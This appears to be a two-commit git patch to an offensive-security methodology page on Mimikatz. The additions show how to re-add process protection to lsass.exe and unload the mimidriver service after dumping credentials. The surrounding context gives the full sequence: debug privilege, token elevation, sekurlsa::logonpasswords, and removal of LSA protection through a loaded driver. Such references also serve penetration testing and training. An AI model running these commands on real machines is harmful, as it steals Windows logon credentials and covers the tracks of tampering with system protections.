From 9be371d7931f0a83677a5254146a8a6467522e46 Mon Sep 17 00:00:00 2001 From: mpgn Date: Wed, 17 Feb 2021 12:15:47 +0100 Subject: [PATCH 1/2] add mimikatz command to protect a process again after removing the protection https://github.com/gentilkiwi/mimikatz/blob/fe4e98405589e96ed6de5e05ce3c872f8108c0a0/mimikatz/modules/kuhl_m_kernel.c#L99 --- Methodology and Resources/Windows - Mimikatz.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/Methodology and Resources/Windows - Mimikatz.md b/Methodology and Resources/Windows - Mimikatz.md index 7fad18a..badce42 100644 --- a/Methodology and Resources/Windows - Mimikatz.md +++ b/Methodology and Resources/Windows - Mimikatz.md @@ -77,6 +77,9 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo mimikatz # privilege::debug mimikatz # token::elevate mimikatz # sekurlsa::logonpasswords + + # Now lets re-add the protection flags to the lsass.exe process + mimikatz # !processprotect /process:lsass.exe ``` - LSA is running as virtualized process (LSAISO) by **Credential Guard** From d1c23c58638bcff34cb9d8e2c55b395c3cca9735 Mon Sep 17 00:00:00 2001 From: mpgn Date: Wed, 17 Feb 2021 12:21:16 +0100 Subject: [PATCH 2/2] Unload the service mimi --- Methodology and Resources/Windows - Mimikatz.md | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/Methodology and Resources/Windows - Mimikatz.md b/Methodology and Resources/Windows - Mimikatz.md index badce42..f2df2d5 100644 --- a/Methodology and Resources/Windows - Mimikatz.md +++ b/Methodology and Resources/Windows - Mimikatz.md @@ -67,7 +67,7 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa # Next upload the mimidriver.sys from the official mimikatz repo to same folder of your mimikatz.exe - #Now lets import the mimidriver.sys to the system + # Now lets import the mimidriver.sys to the system mimikatz # !+ # Now lets remove the protection flags from lsass.exe process @@ -80,6 +80,9 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo # Now lets re-add the protection flags to the lsass.exe process mimikatz # !processprotect /process:lsass.exe + + # Unload the service created + mimikatz # !- ``` - LSA is running as virtualized process (LSAISO) by **Credential Guard**